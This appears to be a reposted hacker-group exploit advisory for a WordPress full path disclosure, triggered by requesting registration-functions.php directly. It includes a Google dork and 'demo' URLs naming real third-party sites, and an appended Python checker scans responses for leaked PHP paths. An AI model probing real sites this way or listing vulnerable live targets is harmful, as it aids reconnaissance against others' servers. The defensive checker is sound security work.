================================================================================
____ _ _ ____ _ _ ____ _ _ ___ ____ ____
|__| | | |__| |__| |__| |_/ |__] |__| |__/ I Love Palestine
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
####
# Exploit Title: WordPress all Version full Path Disclosure Vulnerability
[php]
# Author: KinG Of PiraTeS
# GooGle+ : http://goo.gl/5RVFv
# Facebook Profile: www.fb.me/cr4ck3d
# Facebook Page : www.fb.me/serial.crack
# Facebook Page : www.fb.me/Cars2Luxe
# E-mail: [email protected] / [email protected]
# Web Site : www.1337day.com | www.inj3ct0rs.com
# Category:: webapps
# Google Dork: intext:"powered by WordPress"
# platform : php
# Vendor: http://www.wordpress.com/
# Version: all
# Security Risk : Low ( Only for information )
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####
##
# | >> ——–+++=[ Dz Offenders Cr3w ]=+++——– << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ——> KinG Of PiraTeS * The g0bl!n <——– * |
# | ————————————————- < |
###
#
==============
1)Exploit
=========
[~] P0c [~] :
============
Vuln file in :
http://Localhost/{Path}/wp-includes/registration-functions.php
[~] Vuln Code [~] :
—->
<?php
/**
* Deprecated. No longer needed.
*
* @package WordPress
*/
_deprecated_file( basename(__FILE__), '2.1', null, __( 'This file no longer needs to be included.' ) );
?>
—–>
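When this file is requested directly, WordPress is not loaded, so nothing defines the function called above. PHP stops with a fatal error, and when error display is enabled the message contains the file's full server path.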
[~] D3m0 [~] :
=============
http://hotelsandhighways.com/blog/wp-includes/registration-functions.php?nulled=1337day
http://beavory.com/wp-includes/registration-functions.php?nulled=1337day
http://www.chateau-theme.com/wp-includes/registration-functions.php?nulled=1337day
.
.
.
####
Peace From Algeria to Ghaza
####
=================================**Algerians Hackers**===============================================
# Greets To :
KedAns-Dz ,errajol ettayeb -> All Algerians Hackers & All My Friendz <- ,
–> Hanixpo , Indoushka , Jago-dz ,saoucha , BriscO-Dz , Caddy-Dz & kalashinkov3
Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic ,TrOon , Kondamne, Tn_Scorpion , ..others ?___? <—
(exploit-id.com) , (inj3ct0rs.com) , (Sec4ever.com) , (h4ckforu.com) , (dz-root.com) …
=====================================================================================================
# 1337day.com [2012-07-11]WordPress all Version full Path Disclosure Vulnerability
[/php]
Use this .htaccess to protect yourself : http://blog.yakuza112.org/?p=6397
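
To check whether responses from your own install leak in this way, the added example below (not part of the original advisory or of WordPress) scans a response body for PHP error messages that expose an absolute path and reports the install root a visitor would learn. The function name `find_path_leaks` and the sample bodies are constructed for illustration; the pattern assumes PHP's usual "in <path> on line <n>" error wording.

```python
import re

# Shape of a PHP error as rendered with display_errors on, with or without
# html_errors markup: "<level>: <message> in <absolute path> on line <n>".
PHP_ERROR = re.compile(
    r"(Fatal error|Parse error|Warning|Notice)(?:</b>)?:\s*(.*?)\s+in\s+(?:<b>)?"
    r"((?:[A-Za-z]:\\|/)[^<\r\n]+?\.php)(?:</b>)?\s+on line\s+(?:<b>)?(\d+)"
)

def find_path_leaks(body):
    """Return one dict per PHP error message in `body` that exposes a server path."""
    leaks = []
    for level, message, path, line in PHP_ERROR.findall(body):
        # Everything before wp-includes/ is the install root the visitor learns.
        parts = re.split(r"[\\/]wp-includes[\\/]", path, maxsplit=1)
        leaks.append({
            "level": level,
            "message": message,
            "path": path,
            "line": int(line),
            "install_root": parts[0] if len(parts) == 2 else None,
        })
    return leaks

# Constructed sample bodies (not captured from any real site).
SAMPLE_HTML = (
    "<br />\n<b>Fatal error</b>:  Call to undefined function _deprecated_file() in "
    "<b>/home/example/public_html/blog/wp-includes/registration-functions.php</b>"
    " on line <b>7</b><br />\n"
)
SAMPLE_PLAIN = (
    "Fatal error: Call to undefined function _deprecated_file() in "
    "C:\\xampp\\htdocs\\wp\\wp-includes\\registration-functions.php on line 7"
)
SAMPLE_CLEAN = "<html><body></body></html>"  # error display off: nothing leaked

if __name__ == "__main__":
    for name, body in [("html", SAMPLE_HTML), ("plain", SAMPLE_PLAIN), ("clean", SAMPLE_CLEAN)]:
        print(name, find_path_leaks(body))
```

An empty result for a direct request to the file means the path is no longer disclosed, whether because error display is off or because access to the file is blocked.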